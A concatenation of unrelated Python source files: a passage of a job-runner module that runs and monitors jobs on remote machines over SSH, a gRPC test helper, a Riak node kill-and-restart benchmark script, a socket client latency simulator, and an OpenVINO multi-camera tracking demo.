redirect=logfp.fileno(),
raise_on_error=False )
else:
x = cmd.run_timeout( timeout=timeout,
poll_interval=ipoll,
shell=shl,
chdir=chd,
echo="none",
redirect=logfp.fileno(),
raise_on_error=False )
finally:
logfp.close()
self.set( 'exit', x )
def _run_remote(self, mach):
"""
"""
timeout = self._compute_timeout()
cmd = self.get( 'command' )
shl = self.get( 'shell', True )
pycmd,shcmd = cmd.getCommands( shell=shl )
chd = self.rundir()
sshexe = self.get( 'sshexe', JobRunner.getDefault( 'sshexe' ) )
numconn = self.get( 'connection_attempts',
JobRunner.getDefault( 'connection_attempts' ) )
if self.get( 'sharedlog', False ):
remotelogf = os.path.abspath( self.logname() )
else:
remotelogf = self.logpath()
mydir = os.path.dirname( os.path.abspath( __file__ ) )
from pythonproxy import PythonProxy
if sshexe:
rmt = PythonProxy( mach, sshcmd=sshexe )
else:
rmt = PythonProxy( mach )
tprint( 'Connect machine:', mach )
tprint( 'Remote command:', shcmd )
if chd:
tprint( 'Remote dir:', chd )
if timeout != None:
tprint( 'Remote timeout:', timeout )
if self._is_dryrun():
# touch the local log file but do not execute the command
fp = open( self.logname(), 'a' )
fp.close()
self.set( 'exit', 0 )
else:
T = self._connect( rmt, numconn )
if T != None:
sys.stderr.write( '[' + time.ctime() + '] ' + \
'Connect exception for jobid '+str(self.jobid())+'\n' + T[1] )
sys.stderr.flush()
raise Exception( "Could not connect to "+mach )
try:
inf = rmt.timeout(30).get_machine_info()
tprint( 'Remote info:', inf )
rusr = rmt.timeout(30).os.getuid()
rpid = rmt.background_command( pycmd, remotelogf,
chdir=chd,
timeout=timeout )
self._monitor( rmt, rusr, rpid, timeout )
finally:
rmt.shutdown()
def _connect(self, rmtpy, limit=10):
"""
Tries to make a connection to the remote machine. It tries up to
'limit' times, sleeping 2**i seconds between each attempt. Returns
None if a connection was made, otherwise the return value from
capture_traceback().
"""
assert limit > 0
for i in range(limit):
if i > 0:
time.sleep( 2**i )
rtn = None
try:
rmtpy.start( 30 )
rmtpy.timeout(30).send( remote_side_code )
except:
# raise # uncomment this when debugging connections
rtn = capture_traceback( sys.exc_info() )
else:
break
return rtn
def _monitor(self, rmtpy, rusr, rpid, timeout):
"""
"""
ipoll = self.get( 'poll_interval',
JobRunner.getDefault( 'remote_poll_interval' ) )
xinterval = self.get( 'exception_print_interval',
JobRunner.getDefault( 'exception_print_interval' ) )
# let the job start running before attempting to pull the log file
time.sleep(2)
if timeout != None:
timeout = max( 1, timeout+2 )
ipoll = min( ipoll, max( 1, int( 0.45 * timeout ) ) )
logn = self.logname()
logf = self.logpath()
sharedlog = self.get( 'sharedlog', False )
tstart = time.time()
texc1 = tstart
texc2 = tstart
pause = 2
while True:
elapsed = True
try:
if not sharedlog:
self.updateFile( rmtpy, logf, logn )
s = rmtpy.timeout(30).processes( pid=rpid, user=rusr, fields='etime' )
elapsed = s.strip()
# TODO: add a check that the elapsed time agrees
# approximately with the expected elapsed time
# since the job was launched
except:
# raise # uncomment to debug
xs,tb = capture_traceback( sys.exc_info() )
t = time.time()
if t - texc2 > xinterval:
sys.stderr.write( '[' + time.ctime() + '] ' + \
'Warning: exception monitoring jobid ' + \
str( self.jobid() ) + '\n' + tb + \
'Exception ignored; continuing to monitor...\n' )
sys.stderr.flush()
texc2 = t
self.scanExitStatus( logn )
if not elapsed:
# remote process id not found - assume it is done
break
if timeout != None and time.time()-tstart > timeout:
sys.stderr.write( 'Monitor process timed out at ' + \
str( int(time.time()-tstart) ) + ' seconds for jobid ' + \
str( self.jobid() ) + '\n' )
sys.stderr.flush()
# TODO: try to kill the remote process
break
time.sleep( pause )
pause = min( 2*pause, ipoll )
def updateFile(self, rmtpy, logfile, logname):
"""
The remote 'logfile' is pulled back to the local file 'logname' whenever
its size changes.
[May 2020] The incremental transfer algorithm has been removed; the whole
file is copied instead.
"""
small = int( self.get( 'getlog_small_file_size',
JobRunner.getDefault( 'getlog_small_file_size' ) ) )
chunksize = int( self.get( 'getlog_chunk_size',
JobRunner.getDefault( 'getlog_chunk_size' ) ) )
lcl_sz = -1
if os.path.exists( logname ):
lcl_sz = os.path.getsize( logname )
rmt_sz = rmtpy.timeout(30).file_size( logfile )
if lcl_sz != rmt_sz and rmt_sz >= 0:
rmtpy.session_timeout(10*60)
recv_file( rmtpy, logfile, logname )
rmtpy.session_timeout(None)
def scanExitStatus(self, logname):
"""
Reads the end of the given log file name for "Subcommand exit:" and
if found, the 'exit' attribute of this job is set to the value.
"""
try:
fp = None
sz = os.path.getsize( logname )
fp = open( logname, 'r' )
if sz > 256:
fp.seek( sz-256 )
s = fp.read()
fp.close() ; fp = None
L = s.split( 'Subcommand exit:' )
if len(L) > 1:
x = L[-1].split( '\n' )[0].strip()
if x.lower() == 'none':
# remote process timed out
x = None
else:
try:
ix = int( x )
except:
# leave exit value as a string
pass
else:
# process exited normally
x = ix
self.set( 'exit', x )
except:
if fp != None:
fp.close()
def _is_dryrun(self):
"""
If the environment defines COMMAND_DRYRUN to an empty string or to the
value "1", then this function returns True, which means this is a dry
run and the job command should not be executed.
If COMMAND_DRYRUN is set to a nonempty string, it should be a list of
program basenames, where the list separator is a forward slash, "/".
If the basename of the job command program is in the list, then it is
allowed to run (False is returned). Otherwise True is returned and the
command is not run. For example,
COMMAND_DRYRUN="scriptname.py/jobname"
"""
v = os.environ.get( 'COMMAND_DRYRUN', None )
if v != None:
if v and v != "1":
# use the job name, which is 'jobname' or basename of program
n = self.get( 'name' )
L = v.split('/')
if n in L:
return False
return True
return False
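# Example COMMAND_DRYRUN settings (the job names are hypothetical, shown only
# to illustrate the behaviour documented in _is_dryrun above):
#
#     COMMAND_DRYRUN=""                -> every job is a dry run; nothing executes
#     COMMAND_DRYRUN="1"               -> same as above
#     COMMAND_DRYRUN="pack/train.py"   -> only jobs named "pack" or "train.py"
#                                         actually execute; all others are dry runs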
#########################################################################
class JobRunner:
def __init__(self):
"""
"""
self.jobdb = {}
self.waiting = {}
self.defaults = {
'poll_interval': 15,
'remote_poll_interval': 5*60,
'exception_print_interval': 15*60,
'timeout': None,
'chdir': None,
'sshexe': None,
'connection_attempts': 10,
'getlog_small_file_size': 5*1024,
'getlog_chunk_size': 512,
}
inst = None # a singleton JobRunner instance (set below)
@staticmethod
def setDefault( attr_name, attr_value ):
"""
Set default value for a job attribute.
"""
D = JobRunner.inst.defaults
D[ attr_name ] = attr_value
@staticmethod
def getDefault( attr_name, *args ):
"""
Get the default value for a job attribute.
"""
D = JobRunner.inst.defaults
if len(args) > 0:
return D.get( attr_name, args[0] )
return D[ attr_name ]
def submit_job(self, *args, **kwargs ):
"""
Given the command arguments and keyword attributes, a Job object is
constructed and started in the background. If the job depends on
another job completing first, then it is placed in the "waiting" list
instead of being run.
The job id is returned. The state of the job will be one of
setup : an error during job setup occurred
ready : the job is waiting on another job before being run
run : the job was run in the background (in a thread)
"""
# while here, we might as well check for job completion
self.poll_jobs()
print3()
tprint( 'Submit:', args, kwargs )
print3( ''.join( traceback.format_list(
traceback.extract_stack()[:-1] ) ).rstrip() )
jb = Job()
try:
assert len(args) > 0, "empty or no command given"
if len(args) == 1:
if isinstance( args[0], command.Command ):
cmdobj = args[0]
else:
cmdobj = command.Command( args[0] )
else:
cmdobj = command.Command().arg( *args )
if 'name' in kwargs:
jobname = kwargs['name']
else:
cmd,scmd = cmdobj.getCommands( kwargs.get( 'shell', True ) )
if type(cmd) == type(''):
jobname = os.path.basename( cmd.strip().split()[0] )
else:
jobname = os.path.basename( cmd[0] )
jb.set( 'name', jobname )
jb.set( 'command', cmdobj )
if 'shell' in kwargs:
jb.set( 'shell', kwargs['shell'] )
for n,v in kwargs.items():
jb.set( n, v )
if 'waitforjobid' in kwargs and kwargs['waitforjobid']:
# check validity of waitfor job id before finalizing
wjid = kwargs['waitforjobid']
assert wjid in self.jobdb, \
"waitforjobid not in existing job list: "+str(wjid)
jb.finalize()
self.jobdb[ jb.jobid() ] = jb
except:
# treat exceptions as a job failure
xs,tb = capture_traceback( sys.exc_info() )
jb.set( 'exc', '[' + time.ctime() + '] ' + xs )
sys.stderr.write( '['+time.ctime() +'] ' + \
'Exception preparing job '+str(args)+' '+str(kwargs)+'\n' + tb )
sys.stderr.flush()
# make sure the job is in the database (as a failure)
self.jobdb[ jb.jobid() ] = jb
else:
if 'waitforjobid' in kwargs and kwargs['waitforjobid']:
wjid = kwargs['waitforjobid']
tprint( 'WaitFor:', jb.jobid(), 'waiting on', wjid )
self.waiting[ jb.jobid() ] = ( jb, wjid )
else:
self.launch_job( jb )
# this just ensures that the next job will have a unique date stamp
time.sleep(1)
return jb.jobid()
def launch_job(self, jb):
"""
A helper function that launches a job and returns without waiting.
The underlying command is executed in a thread. The job state
becomes "run".
"""
assert jb.getState() == "ready"
try:
cmd = jb.get( 'command' )
shl = jb.get( 'shell', True )
tprint( 'RunJob:', cmd.asShellString( shell=shl ) )
tprint( 'JobID:', jb.jobid() )
tprint( 'LogFile:', os.path.abspath(jb.logname()) )
m = jb.get( 'machine', None )
if m: tprint( 'Machine:', m )
cd = jb.rundir()
if cd: tprint( 'Directory:', cd )
# run the job in a thread and return without waiting
jb.start()
except:
xs,tb = capture_traceback( sys.exc_info() )
jb.set( 'exc', '[' + time.ctime() + '] ' + xs )
sys.stderr.write( '['+time.ctime() +'] ' + \
'Exception running jobid '+str( jb.jobid() )+'\n' + tb )
sys.stderr.flush()
def isDone(self, jobid):
"""
Tests for job completion. Returns True if the underlying job thread
has completed.
"""
self.poll_jobs()
job = self.jobdb[ jobid ]
st = job.getState()
return st == 'setup' or st == "done"
def complete(self, jobid, **kwargs):
"""
Waits for the job to complete then returns the Job object. There is
no harm in calling this function if the job is already complete.
"""
job = self.jobdb[ jobid ]
ipoll = kwargs.get( 'poll_interval',
JobRunner.getDefault( 'poll_interval' ) )
while True:
self.poll_jobs()
st = job.getState()
if st == "setup" or st == "done":
break
time.sleep( ipoll )
return job
def poll_jobs(self):
"""
Polls all running jobs, then launches pending jobs if the job they
are waiting on has completed.
"""
for jid,jb in self.jobdb.items():
# this is the only place jobs move from "run" to "done"
if jb.getState() == 'run':
if jb.poll() == 'done':
print3()
tprint( 'JobDone:', 'jobid='+str(jb.jobid()),
'exit='+str(jb.get('exit','')).strip(),
'exc='+str(jb.get('exc','')).strip() )
D = {}
for jid,T in self.waiting.items():
jb,waitjid = T
waitstate = self.jobdb[waitjid].getState()
if waitstate == 'setup' or waitstate == 'done':
self.launch_job( jb )
else:
D[jid] = T
self.waiting = D
def complete_all(self, *jobids, **kwargs):
"""
Repeatedly polls each job id until all complete. Returns a list
of Jobs corresponding to the job ids. If no job ids are given, then
all running and waiting jobs are completed.
"""
ipoll = kwargs.get( 'poll_interval',
JobRunner.getDefault( 'poll_interval' ) )
if len(jobids) == 0:
jobids = []
for jid,jb in self.jobdb.items():
st = jb.getState()
if st == 'ready' or st == 'run':
jobids.append( jid )
jobD = {}
while True:
self.poll_jobs()
for jid in jobids:
jb = self.jobdb[jid]
st = jb.getState()
if st == 'setup' or st == 'done':
jobD[jid] = jb
if len(jobD) == len(jobids):
break
time.sleep( ipoll )
return [ jobD[jid] for jid in jobids ]
# construct the JobRunner singleton instance
JobRunner.inst = JobRunner()
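# A short sketch of overriding a runner default before submitting jobs (the
# values are hypothetical; the recognized attribute names are listed in the
# defaults dictionary in JobRunner.__init__):
#
#     JobRunner.setDefault( 'poll_interval', 5 )         # poll local jobs every 5 seconds
#     JobRunner.setDefault( 'sshexe', '/usr/bin/ssh' )   # ssh program for remote jobs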
def recv_file( rmt, rf, wf ):
""
stats = rmt.get_file_stats( rf )
fp = open( wf, 'wt' )
fp.write( rmt.readfile( rf ) )
fp.close()
set_file_stats( wf, stats )
def set_file_stats( filename, stats ):
""
mtime,atime,fmode = stats
os.utime( filename, (atime,mtime) )
os.chmod( filename, fmode )
remote_side_code = """
import os, sys
import traceback
import stat
import subprocess
import time
#############################################################################
_background_template = '''
import os, sys, time, subprocess, signal
cmd = COMMAND
timeout = TIMEOUT_VALUE
nl=os.linesep
ofp=sys.stdout
ofp.write( "Start Date: " + time.ctime() + nl )
ofp.write( "Parent PID: " + str(os.getpid()) + nl )
ofp.write( "Subcommand: " + str(cmd) + nl )
ofp.write( "Directory : " + os.getcwd() + nl+nl )
ofp.flush()
argD = {}
if type(cmd) == type(''):
argD['shell'] = True
if sys.platform.lower().startswith('win'):
def kill_process( po ):
po.terminate()
else:
# use preexec_fn to put the child into its own process group
# (to more easily kill it and all its children)
argD['preexec_fn'] = lambda: os.setpgid( os.getpid(), os.getpid() )
def kill_process( po ):
# send all processes in the process group a SIGTERM
os.kill( -po.pid, signal.SIGTERM )
# wait for child process to complete
for i in range(10):
x = po.poll()
if x != None:
break
time.sleep(1)
if x == None:
# child did not die - try to force it
os.kill( po.pid, signal.SIGKILL )
time.sleep(1)
po.poll()
t0=time.time()
p = subprocess.Popen( cmd, **argD )
try:
if timeout != None:
while True:
x = p.poll()
if x != None:
break
if time.time() - t0 > timeout:
kill_process(p)
x = None # mark as timed out
break
time.sleep(5)
else:
x = p.wait()
except:
kill_process(p)
raise
ofp.write( nl + "Subcommand exit: " + str(x) + nl )
ofp.write( "Finish Date: " + time.ctime() + nl )
ofp.flush()
'''.lstrip()
def background_command( cmd, redirect, timeout=None, chdir=None ):
"Run command (list or string) in the background and redirect to a file."
pycode = _background_template.replace( 'COMMAND', repr(cmd) )
pycode = pycode.replace( 'TIMEOUT_VALUE', repr(timeout) )
cmdL = [ sys.executable, '-c', pycode ]
if chdir != None:
cwd = os.getcwd()
os.chdir( os.path.expanduser(chdir) )
try:
fpout = open( os.path.expanduser(redirect), 'w' )
try:
fpin = open( os.devnull, 'r' )
except:
fpout.close()
raise
try:
argD = { 'stdin': fpin.fileno(),
'stdout': fpout.fileno(),
'stderr': subprocess.STDOUT }
if not sys.platform.lower().startswith('win'):
# place child in its own process group to help avoid getting
# killed when the parent process exits
argD['preexec_fn'] = lambda: os.setpgid( os.getpid(), os.getpid() )
p = subprocess.Popen( cmdL, **argD )
except:
fpout.close()
fpin.close()
raise
finally:
if chdir != None:
os.chdir( cwd )
fpout.close()
fpin.close()
return p.pid
#############################################################################
def readfile( filename ):
""
with open( filename, 'rt' ) as fp:
content = fp.read()
return content
def get_file_stats( filename ):
""
mtime = os.path.getmtime( filename )
atime = os.path.getatime( filename )
fmode = stat.S_IMODE( os.stat(filename)[stat.ST_MODE] )
return mtime,atime,fmode
def get_machine_info():
"Return user name, system name, network name, and uptime as a string."
usr = os.getuid()
try:
import getpass
usr = getpass.getuser()
except:
pass
rtn = 'user='+usr
L = os.uname()
rtn += ' sysname='+L[0]+' nodename='+L[1]
upt = '?'
try:
x,out = runout( 'uptime' )
upt = out.strip()
except:
pass
rtn += ' uptime='+upt
return rtn
def runout( cmd, include_stderr=False ):
"Run a command and return the exit status & output as a pair."
argD = {}
if type(cmd) == type(''):
argD['shell'] = True
fp = None
argD['stdout'] = subprocess.PIPE
if include_stderr:
argD['stderr'] = subprocess.STDOUT
else:
fp = open( os.devnull, 'w' )
argD['stderr'] = fp.fileno()
try:
p = subprocess.Popen( cmd, **argD )
out,err = p.communicate()
except:
fp.close()
raise
if fp != None:
fp.close()
x = p.returncode
if type(out) != type(''):
out = out.decode() # convert bytes to a string
return x, out
def processes( pid=None, user=None, showall=False, fields=None, noheader=True ):
"The 'fields' defaults to 'user,pid,ppid,etime,pcpu,vsz,args'."
plat = sys.platform.lower()
if fields == None:
fields = 'user,pid,ppid,etime,pcpu,vsz,args'
if plat.startswith( 'darwin' ):
cmd = 'ps -o ' + fields.replace( 'args', 'command' )
elif plat.startswith( 'sunos' ):
cmd = '/usr/bin/ps -o ' + fields
else:
cmd = 'ps -o ' + fields
if pid != None:
cmd += ' -p '+str(pid)
elif user:
cmd += ' -u '+user
elif showall:
cmd += ' -e'
x,out = runout( cmd )
if noheader:
# strip off first non-empty line
out = out.strip() + os.linesep
i = 0
while i < len(out):
if out[i:].startswith( os.linesep ):
out = out[i:].lstrip()
break
i += 1
out = out.strip()
if out:
out += os.linesep
return out
def file_size( filename ):
"Returns the number of bytes in the given file name, or -1 if the file does not exist."
filename = os.path.expanduser( filename )
if os.path.exists( filename ):
return os.path.getsize( filename )
return -1
"""
def capture_traceback( excinfo ):
"""
This should be called in an except block of a try/except, and the argument
should be sys.exc_info(). It extracts and formats the traceback for the
exception. Returns a pair ( the exception string, the full traceback ).
"""
xt,xv,xtb = excinfo
xs = ''.join( traceback.format_exception_only( xt, xv ) )
tb = 'Traceback (most recent call last):\n' + \
''.join( traceback.format_list(
traceback.extract_stack()[:-2] +
traceback.extract_tb( xtb ) ) ) + xs
return xs,tb
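# Typical use of capture_traceback (sketch only; 'do_work' is a hypothetical
# callable standing in for code that may raise):
#
#     try:
#         do_work()
#     except Exception:
#         xs, tb = capture_traceback( sys.exc_info() )
#         sys.stderr.write( tb )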
def print3( *args ):
"""
Python 2 & 3 compatible print function.
"""
s = ' '.join( [ str(x) for x in args ] )
sys.stdout.write( s + '\n' )
sys.stdout.flush()
def tprint( *args ):
"""
Same as print3 but prefixes with the date.
"""
s = ' '.join( [ str(x) for x in args ] )
sys.stdout.write( '['+time.ctime()+'] ' + s + '\n' )
sys.stdout.flush()
if sys.version_info[0] < 3:
def _BYTES_(s): return s
else:
bytes_type = type( ''.encode() )
def _BYTES_(s):
if type(s) == bytes_type:
return s
return s.encode( 'ascii' )
|
test_utilities.py
|
# Copyright 2015, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import threading
from grpc._cython import cygrpc
class CompletionQueuePollFuture:
def __init__(self, completion_queue, deadline):
def poller_function():
self._event_result = completion_queue.poll(deadline)
self._event_result = None
self._thread = threading.Thread(target=poller_function)
self._thread.start()
def result(self):
self._thread.join()
return self._event_result
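# Minimal usage sketch (assumes a cygrpc completion queue and a deadline are
# already in scope; the names below are placeholders, not part of this module):
#
#     future = CompletionQueuePollFuture(completion_queue, deadline)
#     ...                        # do other work while the poll runs in the background
#     event = future.result()    # joins the poller thread and returns the polled event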
|
riak_kill_start.py
|
#!/bin/python
import sys;
import subprocess;
from time import sleep;
from threading import Thread;
from Thesis.ycsbClient.runMultipleYcsbClients import executeCommandOnYcsbNodes;
from Thesis.plot.ParseYcsbTestResults import parseAndPlot;
from Thesis.delete_data.deleteAllRiakData import deleteAllDataInRiak;
from Thesis.util.util import executeCommandOverSsh;
from Thesis.util.ycsbCommands.Commands import getLoadCommand;
from Thesis.util.ycsbCommands.Commands import getRunCommand;
RIAK_BINDING = "riak";
# PATH_YCSB_EXECUTABLE = "/root/YCSB/bin/ycsb";
# RECORD_COUNT = 1000;
# OPERATION_COUNT = 999999999;
# TIMESERIES_GRANULARITY = 2000;
def main():
# Check the number of input parameters
if(len(sys.argv) != 8):
printUsageAndExit('Illegal amount of input arguments');
# Retrieve input parameters
IpNodeToBeKilled = sys.argv[1];
ipsInCluster = sys.argv[2].split(',');
runtimeBenchmarkInSeconds = int(sys.argv[3])*60;
killTimeInSeconds = float(sys.argv[4])*60;
startTimeInSeconds = float(sys.argv[5])*60;
pathToWorkloadFile = sys.argv[6];
pathResultFile = sys.argv[7];
# Check validity input parameters
if(runtimeBenchmarkInSeconds <= 0 ):
printUsageAndExit('Illegal runtime of benchmark argument');
if(killTimeInSeconds < 0 or killTimeInSeconds > runtimeBenchmarkInSeconds):
printUsageAndExit('Illegal kill at argument');
if(startTimeInSeconds < 0 or startTimeInSeconds > runtimeBenchmarkInSeconds):
printUsageAndExit('Illegal start at argument');
# Clear database
deleteAllDataInRiak(ipsInCluster);
# Load database
loadCommand = getLoadCommand(RIAK_BINDING, pathToWorkloadFile);
# loadCommand = [PATH_YCSB_EXECUTABLE, 'load', RIAK_BINDING];
# loadCommand.extend(['-P', pathToWorkloadFile]);
# loadCommand.extend(['-p', 'recordcount=' + str(RECORD_COUNT)]);
# loadCommand.extend(['-p', 'operationcount=' + str(OPERATION_COUNT)]);
# loadCommand.extend(['-p', 'measurementtype=timeseries']);
# loadCommand.extend(['-p', 'timeseries.granularity=' + str(TIMESERIES_GRANULARITY), '-s']);
print "Loading database";
exitCode = subprocess.call(loadCommand);
if(exitCode != 0):
raise Exception('Loading database failed');
# Start benchmark
runCommand = getRunCommand(RIAK_BINDING, pathToWorkloadFile, runtimeBenchmarkInSeconds);
# runCommand = [PATH_YCSB_EXECUTABLE, 'run', RIAK_BINDING];
# runCommand.extend(['-P', pathToWorkloadFile]);
# runCommand.extend(['-p', 'recordcount=' + str(RECORD_COUNT)]);
# runCommand.extend(['-p', 'operationcount=' + str(OPERATION_COUNT)]);
# runCommand.extend(['-p', 'measurementtype=timeseries']);
# runCommand.extend(['-p', 'timeseries.granularity=' + str(TIMESERIES_GRANULARITY)]);
# runCommand.extend(['-p', 'maxexecutiontime=' + str(runtimeBenchmarkInSeconds), '-s']);
print "Starting benchmark";
benchmarkThread = Thread(target=executeCommandOnYcsbNodes, args=(runCommand, runCommand, pathResultFile, ['172.16.33.10']));
benchmarkThread.start();
# Stop node at "kill at"
sleep(killTimeInSeconds);
print "Stopping Riak server at " + IpNodeToBeKilled;
executeCommandOverSsh(IpNodeToBeKilled, "su riak -c 'riak stop'");
# Start node at "start at"
sleep(startTimeInSeconds - killTimeInSeconds);
print "Starting Riak server at " + IpNodeToBeKilled;
executeCommandOverSsh(IpNodeToBeKilled, "su riak -c 'riak start'");
# Wait for benchmark to finish and close result file
benchmarkThread.join();
# Plot results
parseAndPlot(pathResultFile);
def printUsageAndExit(errorMessage):
print 'Usage: script <IP node to be killed> <IPs in cluster> <runtime of benchmark (min)> <kill at (min)> <start at (min)> <Path to workload file> <path result file>';
exit();
main();
|
client.py
|
# Code to simulate the clients.
# Each client sends a request for a particular notional size and gets back the best price for that size from each supplier.
from os import startfile
import socket
from random import randint
from threading import Thread
from jpype import *
num_clients = 10 # number of clients to be created
server_port = 12345
client_port = 1025
middle_port_client=2345
# Connect to a Java JVM (via JPype) to read the time in nanoseconds.
# Python's own timing functions are not used because the Java side measures time from a different starting point, so the two clocks would not be comparable.
startJVM("C:/Program Files/Eclipse Adoptium/jdk-17.0.1.12-hotspot/bin/server/jvm.dll", "-ea")
javaPackage = JPackage("java.lang")
javaTimer = javaPackage.System.nanoTime
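# Note: Python 3.7+ also provides time.perf_counter_ns() for nanosecond timestamps,
# but the Java timer is used here so the values stay directly comparable with
# timestamps taken on the Java side.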
# function to create one client with id = id
def create_client(id):
# Connecting to the socket
sr = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
sr.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
sr.connect(('127.0.0.1', middle_port_client))
# wait for confirmation
f = open(f"data/o{id}", 'w')
while sr.recv(1024).decode().lower() != "started":
pass
print("connected", id)
totalT = 0
notional = 0
for _ in range(500): # CHANGE NUMBER OF REQUESTS HERE
# f.write(str(javaTimer()) + '\n')
t1 = javaTimer()
print(_)
# notional=randint(1,1000)
notional += 100
# send the request to the server
sr.send(f"Notional:{notional}".encode())
# wait for the reply from the server. The reply contains the best price for each supplier
s =sr.recv(8192).decode()
log = f"{_}, {javaTimer()}, {notional}, {javaTimer() - t1}, {s}\n"
f.write(log)
totalT += javaTimer() - t1
# print (_,notional, sr.recv(1024).decode())
f.close()
print(totalT)
# after sending the fixes, send "end" and close the client
sr.send("end".encode())
sr.close()
# create different threads for each client
t = [None]*num_clients
for _ in range(num_clients):
t[_] = Thread(target=create_client, args=(_,))
t[_].start()
# wait for all clients to end
for _ in range(num_clients):
t[_].join()
|
multi_camera_multi_target_tracking.py
|
#!/usr/bin/env python3
"""
Copyright (c) 2019-2020 Intel Corporation
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import argparse
import time
import queue
from threading import Thread
import json
import logging as log
import os
import random
import sys
import cv2 as cv
from utils.network_wrappers import Detector, VectorCNN, MaskRCNN, DetectionsFromFileReader
from mc_tracker.mct import MultiCameraTracker
from utils.analyzer import save_embeddings
from utils.misc import read_py_config, check_pressed_keys, AverageEstimator, set_log_config
from utils.video import MulticamCapture, NormalizerCLAHE
from utils.visualization import visualize_multicam_detections, get_target_size
from openvino.inference_engine import IECore # pylint: disable=import-error,E0611
sys.path.append(os.path.join(os.path.dirname(os.path.dirname(os.path.abspath(__file__))), 'common'))
import monitors
set_log_config()
def check_detectors(args):
detectors = {
'--m_detector': args.m_detector,
'--m_segmentation': args.m_segmentation,
'--detections': args.detections
}
non_empty_detectors = [(det, value) for det, value in detectors.items() if value]
det_number = len(non_empty_detectors)
if det_number == 0:
log.error('No detector specified, please specify one of the following parameters: '
'\'--m_detector\', \'--m_segmentation\' or \'--detections\'')
elif det_number > 1:
det_string = ''.join('\n\t{}={}'.format(det[0], det[1]) for det in non_empty_detectors)
log.error('Only one detector expected but got {}, please specify one of them:{}'
.format(len(non_empty_detectors), det_string))
return det_number
def update_detections(output, detections, frame_number):
for i, detection in enumerate(detections):
entry = {'frame_id': frame_number, 'scores': [], 'boxes': []}
for det in detection:
entry['boxes'].append(det[0])
entry['scores'].append(float(det[1]))
output[i].append(entry)
def save_json_file(save_path, data, description=''):
save_dir = os.path.dirname(save_path)
if save_dir and not os.path.exists(save_dir):
os.makedirs(save_dir)
with open(save_path, 'w') as outfile:
json.dump(data, outfile)
if description:
log.info('{} saved to {}'.format(description, save_path))
class FramesThreadBody:
def __init__(self, capture, max_queue_length=2):
self.process = True
self.frames_queue = queue.Queue()
self.capture = capture
self.max_queue_length = max_queue_length
def __call__(self):
while self.process:
if self.frames_queue.qsize() > self.max_queue_length:
time.sleep(0.1)
has_frames, frames = self.capture.get_frames()
if not has_frames and self.frames_queue.empty():
self.process = False
break
if has_frames:
self.frames_queue.put(frames)
def run(params, config, capture, detector, reid):
win_name = 'Multi camera tracking'
frame_number = 0
avg_latency = AverageEstimator()
output_detections = [[] for _ in range(capture.get_num_sources())]
key = -1
if config['normalizer_config']['enabled']:
capture.add_transform(
NormalizerCLAHE(
config['normalizer_config']['clip_limit'],
config['normalizer_config']['tile_size'],
)
)
tracker = MultiCameraTracker(capture.get_num_sources(), reid, config['sct_config'], **config['mct_config'],
visual_analyze=config['analyzer'])
thread_body = FramesThreadBody(capture, max_queue_length=len(capture.captures) * 2)
frames_thread = Thread(target=thread_body)
frames_thread.start()
if len(params.output_video):
frame_size, fps = capture.get_source_parameters()
target_width, target_height = get_target_size(frame_size, None, **config['visualization_config'])
video_output_size = (target_width, target_height)
fourcc = cv.VideoWriter_fourcc(*'XVID')
output_video = cv.VideoWriter(params.output_video, fourcc, min(fps), video_output_size)
else:
output_video = None
prev_frames = thread_body.frames_queue.get()
detector.run_async(prev_frames, frame_number)
presenter = monitors.Presenter(params.utilization_monitors, 0)
while thread_body.process:
if not params.no_show:
key = check_pressed_keys(key)
if key == 27:
break
presenter.handleKey(key)
start = time.perf_counter()
try:
frames = thread_body.frames_queue.get_nowait()
except queue.Empty:
frames = None
if frames is None:
continue
all_detections = detector.wait_and_grab()
if params.save_detections:
update_detections(output_detections, all_detections, frame_number)
frame_number += 1
detector.run_async(frames, frame_number)
all_masks = [[] for _ in range(len(all_detections))]
for i, detections in enumerate(all_detections):
all_detections[i] = [det[0] for det in detections]
all_masks[i] = [det[2] for det in detections if len(det) == 3]
tracker.process(prev_frames, all_detections, all_masks)
tracked_objects = tracker.get_tracked_objects()
latency = max(time.perf_counter() - start, sys.float_info.epsilon)
avg_latency.update(latency)
fps = round(1. / latency, 1)
vis = visualize_multicam_detections(prev_frames, tracked_objects, fps, **config['visualization_config'])
presenter.drawGraphs(vis)
if not params.no_show:
cv.imshow(win_name, vis)
if output_video:
output_video.write(cv.resize(vis, video_output_size))
print('\rProcessing frame: {}, fps = {} (avg_fps = {:.3})'.format(
frame_number, fps, 1. / avg_latency.get()), end="")
prev_frames, frames = frames, prev_frames
print(presenter.reportMeans())
print('')
thread_body.process = False
frames_thread.join()
if len(params.history_file):
save_json_file(params.history_file, tracker.get_all_tracks_history(), description='History file')
